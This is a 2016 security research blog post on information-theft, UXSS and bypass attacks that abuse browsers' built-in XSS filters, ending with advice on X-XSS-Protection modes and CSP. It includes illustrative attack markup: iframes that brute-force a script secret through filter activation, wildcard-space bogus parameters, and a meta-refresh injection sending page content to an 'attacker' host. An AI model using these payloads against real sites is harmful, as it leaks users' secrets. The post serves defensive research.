Information theft attacks abusing browser's XSS filter

2016.04.07

Takeshi Terada, Professional Service Div.

Today's topic is attacks against browser's XSS filter.

XSS filter is a security function built in browsers. It aims to reduce the actual exploitation risk when web applications are vulnerable to XSS.

The filter is regarded as a “best-effort second line of defense”. This means the filter is not expected to block 100% of attacks in the first place. The “first line” here is conventional security measures on web application side.

Looking back on the history, the filter was initially implemented in Microsoft IE8 in 2008. Soon afterward, WebKit-based browsers such as Chrome and Safari released a similar function called XSSAuditor. So, all major browsers except Firefox natively have the function today.

Before the release of the IE8 filter, there was a client-side software that provided such function. The software was a Firefox add-on called NoScript.

Browser's built-in filters have two key features that differentiate themselves from classic filters like NoScript.

1. They detect attacks based on request/response matching.

2. They neutralize detected attacks by modifying response partially.

These features are essential to reduce false positive risks. On the other hand, these also have been causing various vulnerabilities specific to browser's filter.

Before going into the details, let me roughly categorize the filter's vulnerabilities into three types.

1. Bypassing

2. UXSS (Universal XSS)

3. Information theft

The main subject of this post is the third item, information theft, but I'll briefly explain the other two before proceeding to the main discussion.

Attack1. Bypassing

XSS filters are expected to prevent the exploitation of the XSS bugs in web applications, but the filters' holes allowed repeated bypassing. Such holes can be divided into two types. “Out of scope”, is those the vendor decided not to deal with from the beginning and the rest, simply the bugs of the filters.

Since the first filter's release, many bypassing issues have been discovered and most of them except for the out-of-scope ones have been addressed. I will just share some links to such issues here, as bypassing is not the main subject. (Note that only a small portion of such issues is listed here.)

Examples:

Alex Kouzemtchenko aka. kuza55 (IE, 2009)

Eduardo Vela Nava aka. sidarckcat & David Lindsay aka. Thornmaker (IE, 2009)

cirrus at 0x0lab (Safari, 2010)

Masato Kinugawa (Chrome, 2012)

ElevenPaths (Chrome, 2013)

Gareth Heyes (IE, 2015)

Incidentally, it is a bit unclear whether or not bypassing is acknowledged as “vulnerability”. Because the XSS filter is an auxiliary measure, bypassing has not been recognized as a vulnerability in many cases so far. Chrome (Google) seems to maintain the stance even today.

However, in the case of IE (Microsoft), some bypassing bugs seem to have been acknowledged as a vulnerability. You can find them on Microsoft Security Bulletin. Although the vendor tends to label all filter bugs including non-bypassing ones as “Bypass”, at least one bug, CVE-2014-6328 which I reported to the vendor, was really a pure bypassing bug recognized as a vulnerability.

Getting back to the subject, XSS filter is not designed to deal with all types of XSS bugs, and bypassing bugs have been discovered even in in-scope areas.

Attack2. UXSS

XSS filter tries to prevent exploitation of XSS bugs by modifying a part of a response. “UXSS” is an attack that abuses this filter's behavior itself.

Fewer bugs of this type have been discovered than the bypassing bugs.

Examples:

Eduardo Vela Nava aka. sirdarckcat & David Lindsay aka. Thornmaker (IE, CVE-2009-4047)

NeexEmil (Chrome, 2013-2014)

Masato Kinugawa (IE, CVE-2015-6144/CVE-2015-6176)

This type of attack uses a technique that supplies a bogus parameter to cause false detection. The false detection lets the filter alter the part of the page at which the filter detected the injection. Consequently, the page alteration breaks the document structure, which eventually leads to an XSS under certain conditions.

The point here is that the attack succeeds even if the target application itself is immune from vulnerabilities. Issues of this type are basically regarded as the filter's vulnerabilities.

New filter's mode - block mode

The first well-known IE's vulnerability (CVE-2009-4047, sirdarckcat & Thornmaker) highlighted the risks of the filter's page alteration behavior. In response to the bug report, the vendor improved the alteration logic. Additionally, they introduced a new filter's mode called “block mode” in 2010. WebKit followed soon afterwards.

The default of the filter is “normal mode” and it switches to block mode only when it is supplied an explicit response header.

X-XSS-Protection: 1; mode=block

The new mode neutralizes the attack not by partially changing the response, but by replacing the whole response body with a blank content. Obviously, the body is harmless if it's empty. The mode was introduced to prevent future potential issues similar to the first bug.

The apparent instances of the “future potential issues” are the second (NeeXEmil) and third bugs (CVE-2015-6144/CVE-2015-6176, Masato Kinugawa), either of which can be reproduced only in normal mode (non-block mode).

Regarding the third bug, Microsoft's security update in Dec 2015 was incomplete according to Kinugawa because the vendor addressed only part of the methods he reported. The patch's incompleteness might just come out of the vendor's carelessness, but I think it implies the filter issues like this are complicated and not so easy to fix.

Back in 2009, I also mentioned an attack possibility of this sort on my personal blog post. The vendor hasn't addressed the issue even to this day, though they have been aware of it. The reason would be this issue was quite a corner case and the priority was low. Yet, I think there is another reason: they cannot completely fix it, given the current architecture of the filter's non-block mode.

So, it can be said that the filter's non-block mode has inherent UXSS risks and, while such risks can be diminished to some extent, they cannot be completely eliminated.

Attack3. Information theft

The third attack is “information theft”, which is the main subject of this post.

What is similar to UXSS is that this attack doesn't need XSS bugs in web applications. The difference is that the consequence of the attack is not “(U)XSS” but “information theft”.

Firstly, as an example of this type, I will explain one of Chrome's bugs that I discovered in 2014.

Takeshi Terada (Chrome, CVE-2014-3197)

A bug example: CVE-2014-3197

Suppose a target server serves a page containing a script tag as below, when a victim user visits the page (http://target/).

< SCRIPT >var secret='1234';</ SCRIPT >

The attacker's objective is to steal the value of “secret” via XSS filter.

The attacker embeds several iframes on his attack page. Let's assume his page contains three iframes (F1, F2, and F3) here.

< IFRAME name= "F1" src= "http://target/#<SCRIPT>var secret=' 1232 ';" ></ IFRAME > < IFRAME name= "F2" src= "http://target/#<SCRIPT>var secret=' 1233 ';" ></ IFRAME > < IFRAME name= "F3" src= "http://target/#<SCRIPT>var secret=' 1234 ';" ></ IFRAME >

Then, the attacker tricks a victim into accessing this attack page.

In this case, F1 and F2 frames don't trigger the filter while F3 does. This is because only the F3's request URL (the fragment part, “ #<SCRIPT>var secret='1234'; ”) corresponds with the JavaScript code in the response. Note that the filter activation in F3 is caused by the filter's false detection.

The attacker can learn that the secret value is 1234 if he detects the filter's activation in F3. A question rises here: “How can he detect the filter's activation in a cross-origin frame?” The answer was found in the behavior of Chrome's block mode.

At the time, Chrome did internally change the detected page's URL to “ data:, ” (an isolated blank page) in block mode. This means, in the example above, the URL of F1 and F2 are maintained, while that of F3, in which the filter got activated, changes to “ data:, ”.

The attacker can identify the iframe of “ data:, ” in a couple of ways. One apparent way is to change the src attribute of iframes to “ data:,# ” and observe whether onload event fires or not. In the example, the event fires in F1 and F2, while it doesn't in F3 because the only the fragment part of the F3's URL is touched by this src change. This way, he can determine F3 is the answer.

Another way to detect the iframe of “ data:, ” is CSP (Content Security Policy) on the attacker's page. If he uses a CSP policy prohibiting an iframe of data scheme, the violation report tells him the URL change in the iframe caused by the filter.

In either case, exhaustive search against the secret value is needed in the attack, so the data the attacker exfiltrates must be small in entropy. However, the process can be somewhat efficient because he can employ binary search technique by supplying many bogus parameters at a time.

This is the outline of the attack. You can find PoC and more details on the Chromium page.

By the way, the explanation above is a bit simplified. In reality, the attack succeeds only when all the conditions below are satisfied.

1. The web page sets the filter to block mode.

2. The secret occurs within the first 100 characters of the script block.

3. The secret occurs before the first comment or comma.

4. The entropy of the secret is small enough for exhaustive search.

5. The page allows being rendered in iframe.

The second and third conditions are necessary because the Chrome's XSS filter ignores the part after 100 characters or first comment / comma while checking script element.

The vendor's fix was to maintain the URL of the page, in order to avoid the detection of the filter activation through the URL's difference. Apple fixed a quite similar bug of Safari last month in the same way.

Similar vulnerabilities in Chrome

After reporting the bug, I made a quick research on similar bugs found in the past.

As the result, I found some of Chrome's bug reports.

Examples:

Egor Homakov (Chrome, CVE-2013-2848)

NeeXEmil (Chrome, CVE-2013-6656/CVE-2013-6657)

The first one is a bug discovered by Homakov. The bug I found (CVE-2014-3197) was quite similar to his. The only difference is the method to detect the filter activation since not “ data:, ” URL but “ about:blank ” was used when he reported the bug.

The next unique vulnerabilities were reported by NeeXEmil. Unlike Homakov's, these attacks attempt to exfiltrate a POST parameter value instead of a response content.

Another vulnerability that I think worth mentioning is another one of Chrome's discovered in 2015.

Gareth Heyes (Chrome, CVE-2015-1285)

This attack works when the target page in block mode contains iframe(s). Although the basic mechanism of the bug is similar to that of Homakov's, the bug is unique in terms of detecting filter activation via window.length ( iframe_elem.contentWindow.length or window_obj.length ), which is a cross-origin readable value that represents the number of frames in the window. The value is 0 when the filter is activated as the content is empty, and the value is more than 0 otherwise.

His research also improved the effectiveness of the attack in a few areas. The improvements include a method to identify characters ignored in the filter's request/response matching, and a technique using padding to avoid exhaustive search in certain contexts.

IE's vulnerability

Bugs explained above are all Chrome's. There is little information on that type of bugs in other browsers, but I googled a lot and found an IE's bug.

Thomas Stehle (IE, CVE-2011-1992)

Here is the bug description cited from MITRE.

The XSS filter in Microsoft Internet Explorer 8 allows remote attackers to read content from a different (1) domain or (2) zone via a " trial and error " attack, aka " XSS filter Information Disclosure Vulnerability."

The highlighted phrases suggest that the bug is of the same type, but I couldn't find more details online. So I contacted Stehle, the reporter of the bug. In response, he kindly shared the concept of the attack and allowed me to write it in my blog. I will share it here as I think it's worth learning even today. Note that the following explanation is just my understanding of what the attack was like and may not be quite accurate.

Ok, let's see how his attack works.

The target data is the same as the previous example (secret='1234').

Suppose we provide two bogus parameters individually.

bogus1=secret='1+

It triggers the filter as the parameter matches the response.

The filter's regexp matching process causes several hundred millisecond delay .

bogus2=secret='9+

It doesn't trigger the filter and causes no delay.

Thus, the attacker can detect whether the filter is activated or not by measuring the delay using iframe's onload event.

There are two points in the attack. The first is a tailing space (+) of the parameter value. The filter interprets it as a sort of wildcard character, so it was possible to derive a small delay from regexp matching performed by the filter. Interestingly, filter's space handling also played a significant role in Kinugawa's UXSS attack (CVE-2015-6144/CVE-2015-6176).

The other point is that it was possible to activate the filter even when the matching was partial. It enabled obtaining the data on a character-by-character basis. In addition, the attack could work both in block mode and normal mode. These apparently make the attack much more practical.

Considering the fact that the bug was fixed in 2011, Stehle was probably the pioneer in this type of information theft attack against XSS filters.

IE's countermeasure

Several years have passed since then. Now, let's see how IE tries to defend itself from this attack today. In my view, the followings are the keys to the defense:

1. Maintain the origin of the detected page.

2. Restrict the number of attack trials.

3. Apply more tuned criteria for detection.

The first is exactly same as what the present version of Chrome is doing. The filter maintains the origin of the document when being activated even in block mode.

The most interesting part is the second one, restriction on the number of attacks. Specifically, IE's filter changes its behavior when it receives a certain number (10 times) of potential attack attempts. Once hitting the limit, the request/response matching will be loosened. In this state, attacks are unlikely to succeed because it gets activated even when request doesn't strictly correspond with the response.

This solution may be regarded as “mitigative” in a strict sense, as there is still the attack window when the target data is small enough to enumerate within 10-time attempts. However, this solution was probably the vendor's answer to the Stehle's bug report.

The last is “tuned criteria”. IE's filter catches only the strings that appear “offensive”. Therefore, just having both the page and the request containing the same string like “ var secret='...' ” doesn't trigger the filter. On one hand, the filter is so coarse that it is triggered just when both request and response contain “ <script> ”. Anyway, with this IE's matching approach, it is more difficult to brute-force a string (at least) inside script element, whether by accident or design.

Further attack possibility

These information theft issues are recognized as browser's vulnerabilities and basically addressed as often as they were reported. However, the question I would like to raise here is: “Are the issues really fixed?” If I may go further, that would be: “Are the issues really theoretically fixable?”

Actually, Chrome's aforementioned CVE-2015-1285 bug (Gareth Heyes) which affects web pages containing iframes was fixed only partially. This is because the attack utilizes browser's specification that allows cross-origin read of window.length and it's not realistic to change the spec.

So, the core problem, which allows brute-forcing the script or something of the kind if the page in block mode has iframes, is still left unfixed. I think Chrome's security team concluded that the core problem was impossible to fix for now. Furthermore, this has never been an issue specific to Chrome. Under certain conditions, browsers other than Chrome are also susceptible to similar attacks even today.

Now, let's think about further attack possibility here.

Before proceeding, let me organize the process of information theft attack.

The two points in the attack are as follows:

1. Add a bogus parameter to trigger the filter's false detection.

- A secret value must be involved in the request/response matching process.

2. Detect the filter's activation.

- The detection must be performed cross-origin.

Let's look at the second item first.

Detecting cross-origin filter activation

How can the attacker know if the filter was activated or not in block mode?

If the target page contains frames, he can do that by window.length as Heyes showed.

But, how can it be done in block mode not containing frames?

Firstly, it is obvious that the filter's response alteration behavior considerably affects rendering time and traffic amount in block mode. These can be a clue for the activation at least if we assume an eavesdropper in the encrypted connection.

Secondly, suppose an image on the attacker's server is embedded in the lower part of the target page. This situation may be a bit too convenient for the attacker, but it is not improbable. In this case, an image request doesn't come to the attacker's server when the filter is activated, while it comes when the filter isn't activated. Thus, the absence of image fetch tells the filter activation in this condition.

So, how about attacks in non-block mode?

There is an attack example in non-block mode, IE's CVE-2011-1992 (Thomas Stehle), which uses processing time of the filter itself. However, if the attacker utilizes the response change as a clue, there would be little chance to detect the activation as non-block mode alters the response only partially. Thus, it can be said that non-block mode is safer than block mode in terms of information theft.

By the way, discussions of such side channel attacks are not new. Regarding the timing attack, in addition to Stehle's CVE-2011-1992, Homakov mentioned the attack possibility in his bug discussion of CVE-2013-2848. Also, in my bug discussion of CVE-2014-3197, I mentioned the possibility of attacks using images or something of the sort on the attacker's server.

Triggering false detection for attacker's convenience

Next item is a technique to cause false detection in a way convenient for attackers.

This probably needs a bit more explanation.

In IE's case, a string like 1234 in “ <SCRIPT>var secret='1234' ” is disregarded by the filter's request/response matching as already mentioned. So is the value of “ <input type="hidden" name="secret" value="1234"> ”. In addition, IE has a restriction on number of trials.

In the case of Chrome's script element, the part after 100 characters or first comment / comma is ignored in the matching process as mentioned earlier. Additionally, exhaustive search is required.

That means there are restrictions in the request/response matching and they reduce the exploitability of the attack. The way to go around or ease the restrictions is the question here.

Regarding the IE's matching process, last year's UXSS research (CVE-2015-6144/CVE-2015-6176, Masato Kinugawa) revealed that it is possible to stretch the matched range by space characters which work as a wildcard. We can apply his technique to information theft in some cases.

Suppose a server serves an HTML as below:

... < script type= "text/javascript" src= "/js/jquery.js" ></ script > </ head > < body > < input type= "hidden" name= "secret" value= " 1234 " > < img src= "/img/a.gif" > ...

An attacker gives two bogus parameters separately.

bogus1=<script+t+++++++++++++++++++123+++src= → It activates the filter.

bogus2=<script+t+++++++++++++++++++127+++src= → It doesn't.

In the case of bogus1, the matched range is stretched to “ <script type= ... value="1234" ... <img src= ”, the underlined part above. This contains the hidden value, which is normally out of the range. This way, we can use space characters or something of the kind to stretch the matched part.

This technique may also be effective to detect the filter activation. With bogus1 parameter, the filter removes the script element even in normal mode, and side channel attacks can possibly detect the removal of the script.

Besides the technique above, let me just say further research is needed in that field.

The filter's issues are fixable?

Let's get back to the original question: “Are the information theft issues really fixed?” or “Are the issues really theoretically fixable?”

The answer is that the information theft issues are not completely solved so far. Probably, they can be mitigated by the browser-side effort, yet theoretically there is no complete solution.

However, another question arises here: “Is it really an issue that must be completely solved?” In the attack methods presently known, an attack succeeds only when some relatively rare conditions are met. In addition, the impact of information theft is generally not as serious as that of (U)XSS.

Therefore “accepting the risk” may be a realistic option. Chrome's CVE-2015-1285 (Gareth Heyes) was not fundamentally fixed probably as the result of the vendor's risk acceptance. The same is true for UXSS bugs such as the aforementioned one I wrote in my personal blog post. However, whether the risk is acceptable or not solely depends on the application.

Conclusion

I discussed three types of attacks against XSS filter, especially information theft.

Attack types on which I personally place more importance are “UXSS” and “information theft”, which turn otherwise-secure websites into vulnerable ones. These issues are inherent to the filters and difficult to address as they utilize the filter's key behavior.

Another problem is that it is difficult for website developers (and even security researchers) to know whether or not a given page is susceptible to UXSS or information theft attacks. This is because the filter's behavior is different from each other and, in addition, its internal process is complicated.

When thinking about these issues, what always comes to my mind is the filter's difficult position. I described XSS filters as an auxiliary countermeasure earlier in the post. This means the place where XSS prevention measure should be implemented is web application. In other words, browsers are not a good place to do it. Generally, security measures implemented in a wrong place tend to be more complicated, incomplete and likely to cause side effects. UXSS and information theft are the typical examples.

Despite the side effect issues, XSS filters have been thwarting XSS exploitation to some degree even though this post focuses on the negative aspects of the filter. Considering the good and evil of the filter, a phrase “double-edged sword” sounds appropriate as a description.

What's the best filter setting?

So, how should website owners deal with this double-edged function?

We have three filter setting options for now. What's the best choice out of the three?

1. Normal mode (non-block mode) X-XSS-Protection: 1 (default) 2. Block mode X-XSS-Protection: 1; mode=block 3. Disabled X-XSS-Protection: 0

As a safeguard against application's XSS bugs, options other than “disabled” are better. When you take UXSS into account, options other than “normal mode” are better. When you consider information theft, options other than “block mode” are better. Thus, we don't have a universally correct option, unfortunately.

Firstly, let's learn from others. In ordinary websites, normal mode seems to be by far the most common with a small portion using block mode and very few disabling the filter.

Next, let's see what popular and presumably security-conscious websites chose:

(Top page and few other pages of the sites were investigated)

Alexa top 10 sites:

google.com block facebook.com disabled youtube.com block baidu.com normal (no explicit instruction) yahoo.com normal (no explicit instruction) amazon.com normal (no explicit instruction) wikipedia.org normal (no explicit instruction) qq.com normal (no explicit instruction) google.co.in block twitter.com block

Others popular sites:

yahoo.co.jp block dropbox.com block microsoft.com normal (no explicit instruction) bing.com normal (no explicit instruction) login.live.com disabled

When it comes to security-conscious websites, block mode seems to gain greater popularity, compared with ordinary sites. So, block mode would be the way to go if we simply follow them.

However, in my opinion, the ideal option is to disable the filter after implementing solid XSS countermeasures on the application's side. Disabling it frees us from uncertainty brought by the filter such as UXSS, information theft and false positives.

Actually, there are a few high-profile websites disabling the filter, namely Facebook and Microsoft (maybe only login.live.com). Facebook made the decision not to avoid simple false positives but to address security issues caused by the filter itself according to Homakov's blog post.

That being said, disabling requires the web application itself to be (considerably) immune to XSS. So, it might be too idealistic in a sense. If so, another question may arise here: “What shall we do when we are not very sure about the application's security?”

Kinugawa recommends block mode in his slides. What he argued was that information theft, which doesn't lead to script execution, is less serious than filter's UXSS or application's XSS.

I also think that block mode is better given that the application is likely to be vulnerable. The basis of this argument is completely same as his. Anyway, I would like to emphasize here again that application-side effort to eliminate XSS bugs is essential, because the filter is incomplete and even non-existent in some browsers.

CSP, another second line of defense

Then, how should application-side XSS countermeasures be implemented?

The key countermeasures are conventional secure programing practice and CSP (Content Security Policy), which I would like to briefly discuss here.

CSP is a specification standardized in W3C in 2012. It allows developers to declare the permitted origins of resources such as JavaScript and CSS in a response header. Most major browsers support it today. The spec has been expanded and CSP Level3 is under development presently.

The CSP's advantages and disadvantages are as follows:

Advantages:

- It is a very powerful anti-XSS solution if properly used.

- Using it on your site brings you no known side effects unlike XSS filter.

(Meanwhile, Homakov pointed out that CSP on an attacker's site could benefit him.)

Disadvantages:

- IE is slow in CSP's adoption.

- It requires much labor and time for secure implementation.

- It's not so compatible with performance optimization by in-lined JS and CSS.

- It doesn't block some of Content Injection attacks.

A big disadvantage, particularly in comparison with XSS filters, is much labor and time necessary for implementation. Dropbox's blog posts, which explain how they introduced CSP, suggest that they had to put considerable amount of resources into its deployment.

Even with regard to the disadvantages, websites that found much advantage in CSP have already started employing it. Twitter, Facebook and Dropbox are the well-known examples (though some sites are using a bit loose rules so far).

Attacks beyond XSS

Because CSP is more powerful than XSS filter as an anti-XSS measure, it would be an option to enable CSP and discard the filter. Nevertheless, some websites such as Twitter and Dropbox are using both CSP and the filter in block mode. This might be related to not only the first item of the disadvantages, but also the last item, “Content Injection”.

Content Injection, in comparison with XSS, is a broader class of attack that contains both XSS and JavaScript-less attacks ranging from simple web page defacement to more advanced information theft attacks. Attacks not requiring JavaScript nor CSS have been discussed by researchers such as Michal Zalewski, Gareth Heyes and filedescriptor.

Interestingly, XSS filter does better job in some of such attacks (obviously not all attacks though). Here is an example taken from Zalewski and filedescriptor's article.

< meta http-equiv= Refresh content= '1;url=http://attacker/?

When an attacker injects this payload, the content between the reflection point and the first single quotation occurrence in the subsequent part of the page is sent to the attacker's server via redirection. XSS filter blocks this attack, but CSP doesn't because it doesn't cover redirection.

This means, while CSP is far better than the filter as an anti-XSS measure, it's not necessarily true when it comes to Content Injection, the broader attack. This may be one of the reasons why some websites like to employ both features.

As a side note, CSP's specification clearly states:

CSP is not intended as a first line of defense against content injection vulnerabilities.

The first line of defense is the application program's security itself, after all.

Future prospects of XSS filters and its research

As shown above, new techniques in the three attack types (bypassing, UXSS and information theft) were discovered recently. It implies that the filter continues to be an important research subject for the moment. I myself wish to take time to work on these, especially the information theft.

From a browser vendors' perspective, the issues will need continued addressing through the filter's delicate tuning and tweaking. In addition to tweaking the existing modes, I think browser vendors could provide a new mode free from side effects.

One idea is to add a new opt-in mode that doesn't perform strict request/response matching. IE seemingly already has a similar internal mode which is enabled by 10 or more attack attempts as mentioned earlier. The mode will inevitably increase false detections, but it would relieve us from the side effect, information theft.

P.S. The content of this post might be a bit old because I almost finished writing it by the end of this January and have been waiting for the Safari's fix being released. In the meantime, a nice blog article discussing the filter was posted by filedescriptor. You can check his post out here.